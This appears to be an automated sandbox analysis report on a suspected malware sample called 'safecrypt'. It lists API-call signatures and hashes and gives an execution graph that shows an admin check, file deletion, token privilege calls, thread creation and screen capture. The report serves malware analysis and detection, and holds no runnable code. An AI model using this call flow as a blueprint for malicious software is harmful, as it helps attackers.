                    • Instruction ID: 8772bfaca92426e34700edab6e5d88881982de18e5cb86d4e902e856a2a61c82
                    • Opcode Fuzzy Hash: 16d01db0c5107b380cbd906b4d7e195e901270f65508c29fc449c5ea51d449b7
                    • Instruction Fuzzy Hash: F1D01229118A400ADE2ABBB15B7653D3E16EB83705B24BFCDC127445A3CD669B07A84A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: cd313ec640d03c0afd1ac13d35e3902a6b72c2ee7a84630c48733ee02e280b7d
                    • Instruction ID: affddc76cda8581bacb71542ce95b849105c8ba41d0c0971355876dcdb0d3dab
                    • Opcode Fuzzy Hash: cd313ec640d03c0afd1ac13d35e3902a6b72c2ee7a84630c48733ee02e280b7d
                    • Instruction Fuzzy Hash: F5D02224C08664BDE77375B88F007BC3E836B59340F140F28D06F872A2CA02464B85B3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: c68cbe7e80cc2d0bd955f4f7a5547f1a08041d3f25668557ccdd1799c90d50f7
                    • Instruction ID: bd20b92a0b3790b40aa40dfa59ec5cb3288d8794f7dd5c991730d615062224fb
                    • Opcode Fuzzy Hash: c68cbe7e80cc2d0bd955f4f7a5547f1a08041d3f25668557ccdd1799c90d50f7
                    • Instruction Fuzzy Hash: D4D0A935E1802049CB1CFB7068420BD32220B83B28B00639CC02A920C0DF3083034902
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 1bd418a1a0c1aecc70abcd99eabf37fd1b66588c424d4c1ff54a6ff2b8515ad9
                    • Instruction ID: 8e27bfc544583eda9e08c6c38578d099dbb46afef5096e1f16332e3ed91d1f6e
                    • Opcode Fuzzy Hash: 1bd418a1a0c1aecc70abcd99eabf37fd1b66588c424d4c1ff54a6ff2b8515ad9
                    • Instruction Fuzzy Hash: 76C08075D0411045CF1CF7716D511BD73214F83728F10679DC036910C0DF3497074942
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 16%
                    			E00441E24(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                    
                    				_push(_a16);
                    				_push(_a12);
                    				_push(_a8);
                    				_push(_a4);
                    				L00441E7C(); // executed
                    				return __eax;
                    			}




                    APIs
                    • #1576.MFC42(00441B7A,00441B7A,00441B7A,00441B7A,00441B7A,00000000,?,0000000A), ref: 00441E34
                    Memory Dump Source
                    • Source File: 00000000.00000002.325756086.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.325749384.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.325794672.0000000000442000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.325826185.0000000000474000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.325834815.0000000000475000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.325862733.000000000086F000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_safecrypt.jbxd
                    Similarity
                    • API ID: #1576
                    • String ID:
                    • API String ID: 1976119259-0
                    • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                    • Instruction ID: 9951792e5f65cba84744b8241d46eb1ba3a33096f7a81e5f749b2ad7617d2520
                    • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                    • Instruction Fuzzy Hash: ACB0083A018386ABDB02DE91880192ABAA6BF98304F584C1DB6A10107187668468AB56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: e03bf6073e2973dbd938e586e03bd19101dba163028696116d509b4f8e9cb134
                    • Instruction ID: 9a043ad61b7c9ebb990ada4959fb05952dd03a4bd7f1210d08aea783b6896937
                    • Opcode Fuzzy Hash: e03bf6073e2973dbd938e586e03bd19101dba163028696116d509b4f8e9cb134
                    • Instruction Fuzzy Hash: 84A00223604510054909BBF55D7305D55078FC0604B01AE2EC02385096CD3D570B485B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 213718747aa00cf834fec87a8a1e3165e1d499cdf6dc26a96c939c6725be76ee
                    • Instruction ID: 930805c6fa702f93b21f617f486c08459d43b8888592f950b317918ca1cc6419
                    • Opcode Fuzzy Hash: 213718747aa00cf834fec87a8a1e3165e1d499cdf6dc26a96c939c6725be76ee
                    • Instruction Fuzzy Hash: AC418770D18212EEEF1E77708C11A7D36AABB83B41F149BEDD04FA9041EE350647C94A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: bd4d4b1ad84da1ffb4e851fa152b745fab45bf4bea23ce4f0b5c90c3c3cc9ce5
                    • Instruction ID: 9703344db3cb095051ce6efc1dc25100d8960384968a02eb9fec0f971c61d7c3
                    • Opcode Fuzzy Hash: bd4d4b1ad84da1ffb4e851fa152b745fab45bf4bea23ce4f0b5c90c3c3cc9ce5
                    • Instruction Fuzzy Hash: 0C41F626A78502EDEB2D77758D15E3A388EBB80705F049F1DA103D91D1FE7A450FC466
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Initialize
                    • String ID:
                    • API String ID: 2538663250-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Execution Graph

                    Execution Coverage:2.4%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:7.3%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:28

                    Graph

16430 42bc78 _memmove 16429->16430 16431 42bc7f FreeEnvironmentStringsW 16430->16431 16431->16367 16433 42bbc8 _wparse_cmdline 16432->16433 16434 42c80d __malloc_crt 66 API calls 16433->16434 16435 42bc0b _wparse_cmdline 16433->16435 16434->16435 16435->16369 16437 42b979 _wcslen 16436->16437 16439 42b971 16436->16439 16438 42c852 __calloc_crt 66 API calls 16437->16438 16442 42b99d _wcslen 16438->16442 16439->16373 16440 42b9f3 16441 4258b8 _free 66 API calls 16440->16441 16441->16439 16442->16439 16442->16440 16443 42c852 __calloc_crt 66 API calls 16442->16443 16444 42ba19 16442->16444 16445 426210 __wsetenvp 66 API calls 16442->16445 16447 42ba30 16442->16447 16443->16442 16446 4258b8 _free 66 API calls 16444->16446 16445->16442 16446->16439 16448 426c91 __invoke_watson 10 API calls 16447->16448 16449 42ba3c 16448->16449 16449->16373 16451 428679 __IsNonwritableInCurrentImage 16450->16451 16861 42c7ea 16451->16861 16453 428697 __initterm_e 16455 4286b8 __IsNonwritableInCurrentImage 16453->16455 16864 42d112 16453->16864 16455->16377 16929 42dfb0 16456->16929 16460 41f435 AllocateAndInitializeSid 16461 41f493 SHGetFolderPathW 16460->16461 16462 41f46b CheckTokenMembership 16460->16462 16944 4233b0 16461->16944 16464 41f480 16462->16464 16465 41f484 FreeSid 16462->16465 16464->16465 16465->16461 16466 41f4d4 10 API calls 16954 425aa2 16466->16954 16469 425aa2 __NMSG_WRITE 66 API calls 16470 41f59b 16469->16470 16471 425aa2 __NMSG_WRITE 66 API calls 16470->16471 16472 41f5b2 SHGetFolderPathW SHGetFolderPathW SHGetFolderPathW GetModuleFileNameW 16471->16472 16473 426210 __wsetenvp 66 API calls 16472->16473 16474 41f5fe 16473->16474 16475 425aa2 __NMSG_WRITE 66 API calls 16474->16475 16476 41f615 DeleteFileW 16475->16476 16963 420440 CreateFileW 16476->16963 16478 41f628 LookupPrivilegeValueA 16479 41f642 16478->16479 16480 41f64b 16478->16480 16966 4204d0 GetCurrentProcess OpenProcessToken 16479->16966 16973 41fc40 16480->16973 16483 41f655 16484 41f6c8 16483->16484 
16485 41f65c 16483->16485 16487 41fd50 108 API calls 16484->16487 16486 41f695 16485->16486 16488 41f669 16485->16488 16489 41f6cd 16486->16489 16992 41fd50 16486->16992 16487->16489 16488->16489 16491 41f674 16488->16491 16492 41f679 16489->16492 17032 412fc0 16489->17032 17011 41eb60 16491->17011 16496 4256d3 __write_nolock 5 API calls 16492->16496 16493 41f6a8 16493->16489 16497 41f6ac 16493->16497 16499 41f68f 16496->16499 16500 4256d3 __write_nolock 5 API calls 16497->16500 16498 41f6de GetLastError 16498->16492 16503 41f6f7 _memset 16498->16503 16499->16381 16501 41f6c2 16500->16501 16501->16381 16504 41f707 GetVersionExW 16503->16504 17049 401470 16504->17049 16509 412fc0 6 API calls 16510 41f740 CreateThread 16509->16510 17076 41f1c0 16510->17076 16514 41f1c0 10 API calls 16515 41f77e 16514->16515 16516 41f1c0 10 API calls 16515->16516 16517 41f78b 16516->16517 16518 41f1c0 10 API calls 16517->16518 16519 41f798 16518->16519 16520 41f1c0 10 API calls 16519->16520 16521 41f7a5 16520->16521 17082 41eee0 16521->17082 16526 420730 97 API calls 16527 41f89f _memset 16526->16527 16527->16527 17136 42643b 16527->17136 16532 41f92f 17169 4265fb 16532->17169 16533 41f957 16535 41f95d GdipAlloc 16533->16535 16538 41f98e 16533->16538 16537 41f96b GdipCreateBitmapFromHBITMAP 16535->16537 16535->16538 16536 41f939 17182 420560 GetDC CreateCompatibleBitmap 16536->17182 16537->16538 16539 41f9ca CreateThread SetThreadPriority WaitForSingleObject 16538->16539 16541 412fc0 6 API calls 16538->16541 16540 41fa0b _memset 16539->16540 17192 414320 16540->17192 16542 41f9b9 16541->16542 16542->16539 16549 414320 97 API calls 16550 41fa6e 16549->16550 17209 41fbe0 CreateFileW 16550->17209 16553 420750 6 API calls 16554 41fa8b 16553->16554 16555 414320 97 API calls 16554->16555 16556 41faaa GdipSaveImageToFile 16555->16556 16557 41fad0 16556->16557 16558 420750 6 API calls 16557->16558 16559 41fae4 16558->16559 16560 412fc0 6 API calls 16559->16560 16561 41faf4 16560->16561 16562 
412fc0 6 API calls 16561->16562 16563 41fb10 16562->16563 18768 428702 16572->18768 16574 428853 16574->16382 16576 426762 16575->16576 16577 42675d 16575->16577 16579 4288d0 __NMSG_WRITE 66 API calls 16576->16579 16578 428a7f __FF_MSGBANNER 66 API calls 16577->16578 16578->16576 16580 42676a 16579->16580 16581 4285ea __mtinitlocknum 3 API calls 16580->16581 16582 426774 16581->16582 16582->16355 16584 428a7f __FF_MSGBANNER 66 API calls 16583->16584 16585 428896 16584->16585 16586 4288d0 __NMSG_WRITE 66 API calls 16585->16586 16587 42889e 16586->16587 18798 428858 16587->18798 16591 428702 _doexit 66 API calls 16590->16591 16592 428879 16591->16592 16592->16385 16594 42a7a5 DecodePointer 16593->16594 16595 42a7b4 16593->16595 16594->16595 16596 42a7c5 TlsFree 16595->16596 16597 42a7d3 16595->16597 16596->16597 16598 42cc3b DeleteCriticalSection 16597->16598 16599 42cc53 16597->16599 16631 4258b8 16598->16631 16601 42cc65 DeleteCriticalSection 16599->16601 16602 42aa67 16599->16602 16601->16599 16602->16358 16657 42a755 RtlEncodePointer 16603->16657 16605 42861c __init_pointers __initp_misc_winsig 16658 42cdbb EncodePointer 16605->16658 16607 428642 EncodePointer EncodePointer EncodePointer EncodePointer 16608 42cbd5 16607->16608 16609 42cbe0 16608->16609 16610 42cbea InitializeCriticalSectionAndSpinCount 16609->16610 16611 42ab58 16609->16611 16610->16609 16610->16611 16611->16402 16611->16403 16614 42c85b 16612->16614 16615 42ab87 16614->16615 16616 42c879 Sleep 16614->16616 16659 42e3e0 16614->16659 16615->16402 16615->16408 16617 42c88e 16616->16617 16617->16614 16617->16615 16670 428d80 16618->16670 16620 42a7e4 GetModuleHandleW 16671 42cd4f 16620->16671 16622 42a822 InterlockedIncrement 16678 42a87a 16622->16678 16625 42cd4f __lock 64 API calls 16626 42a843 16625->16626 16681 42a41c InterlockedIncrement 16626->16681 16628 42a861 16693 42a883 16628->16693 16630 42a86e __commit 16630->16412 16632 4258c3 HeapFree 16631->16632 16633 4258ec __dosmaperr 16631->16633 
16632->16633 16634 4258d8 16632->16634 16633->16597 16637 426d35 16634->16637 16640 42a88c GetLastError 16637->16640 16639 4258de GetLastError 16639->16633 16654 42a767 TlsGetValue 16640->16654 16643 42a8f9 SetLastError 16643->16639 16644 42c852 __calloc_crt 62 API calls 16645 42a8b7 16644->16645 16645->16643 16646 42a8bf DecodePointer 16645->16646 16647 42a8d4 16646->16647 16648 42a8f0 16647->16648 16649 42a8d8 16647->16649 16651 4258b8 _free 62 API calls 16648->16651 16650 42a7d8 __getptd_noexit 62 API calls 16649->16650 16653 42a8e0 GetCurrentThreadId 16650->16653 16652 42a8f6 16651->16652 16652->16643 16653->16643 16655 42a797 16654->16655 16656 42a77c DecodePointer TlsSetValue 16654->16656 16655->16643 16655->16644 16656->16655 16657->16605 16658->16607 16660 42e407 16659->16660 16661 42e3ec 16659->16661 16664 42e41a RtlAllocateHeap 16660->16664 16665 42e441 16660->16665 16668 428ac7 DecodePointer 16660->16668 16661->16660 16662 42e3f8 16661->16662 16663 426d35 _write_string 65 API calls 16662->16663 16666 42e3fd 16663->16666 16664->16660 16664->16665 16665->16614 16666->16614 16669 428adc 16668->16669 16669->16660 16670->16620 16672 42cd77 EnterCriticalSection 16671->16672 16673 42cd64 16671->16673 16672->16622 16696 42cc8d 16673->16696 16675 42cd6a 16675->16672 16676 42888c __amsg_exit 65 API calls 16675->16676 16677 42cd76 16676->16677 16677->16672 16859 42cc76 LeaveCriticalSection 16678->16859 16680 42a83c 16680->16625 16682 42a43a InterlockedIncrement 16681->16682 16683 42a43d 16681->16683 16682->16683 16684 42a447 InterlockedIncrement 16683->16684 16685 42a44a 16683->16685 16684->16685 16686 42a457 16685->16686 16687 42a454 InterlockedIncrement 16685->16687 16688 42a461 InterlockedIncrement 16686->16688 16690 42a464 16686->16690 16687->16686 16688->16690 16689 42a47d InterlockedIncrement 16689->16690 16690->16689 16691 42a48d InterlockedIncrement 16690->16691 16692 42a498 InterlockedIncrement 16690->16692 16691->16690 16692->16628 16860 42cc76 
LeaveCriticalSection 16693->16860 16695 42a88a 16695->16630 16697 42cc99 __commit 16696->16697 16698 42ccbf 16697->16698 16721 428a7f 16697->16721 16706 42cccf __commit 16698->16706 16757 42c80d 16698->16757 16704 42ccf0 16709 42cd4f __lock 65 API calls 16704->16709 16705 42cce1 16708 426d35 _write_string 65 API calls 16705->16708 16706->16675 16708->16706 16711 42ccf7 16709->16711 16712 42cd2a 16711->16712 16713 42ccff InitializeCriticalSectionAndSpinCount 16711->16713 16716 4258b8 _free 65 API calls 16712->16716 16714 42cd1b 16713->16714 16715 42cd0f 16713->16715 16763 42cd46 16714->16763 16717 4258b8 _free 65 API calls 16715->16717 16716->16714 16719 42cd15 16717->16719 16720 426d35 _write_string 65 API calls 16719->16720 16720->16714 16766 42d3e8 16721->16766 16723 428a86 16724 42d3e8 __FF_MSGBANNER 66 API calls 16723->16724 16726 428a93 16723->16726 16724->16726 16725 4288d0 __NMSG_WRITE 66 API calls 16727 428aab 16725->16727 16726->16725 16728 428ab5 16726->16728 16729 4288d0 __NMSG_WRITE 66 API calls 16727->16729 16730 4288d0 16728->16730 16729->16728 16731 4288f1 __NMSG_WRITE 16730->16731 16732 428a0d 16731->16732 16733 42d3e8 __FF_MSGBANNER 63 API calls 16731->16733 16827 4256d3 16732->16827 16736 42890b 16733->16736 16735 428a7d 16754 4285ea 16735->16754 16737 428a1c GetStdHandle 16736->16737 16738 42d3e8 __FF_MSGBANNER 63 API calls 16736->16738 16737->16732 16741 428a2a _strlen 16737->16741 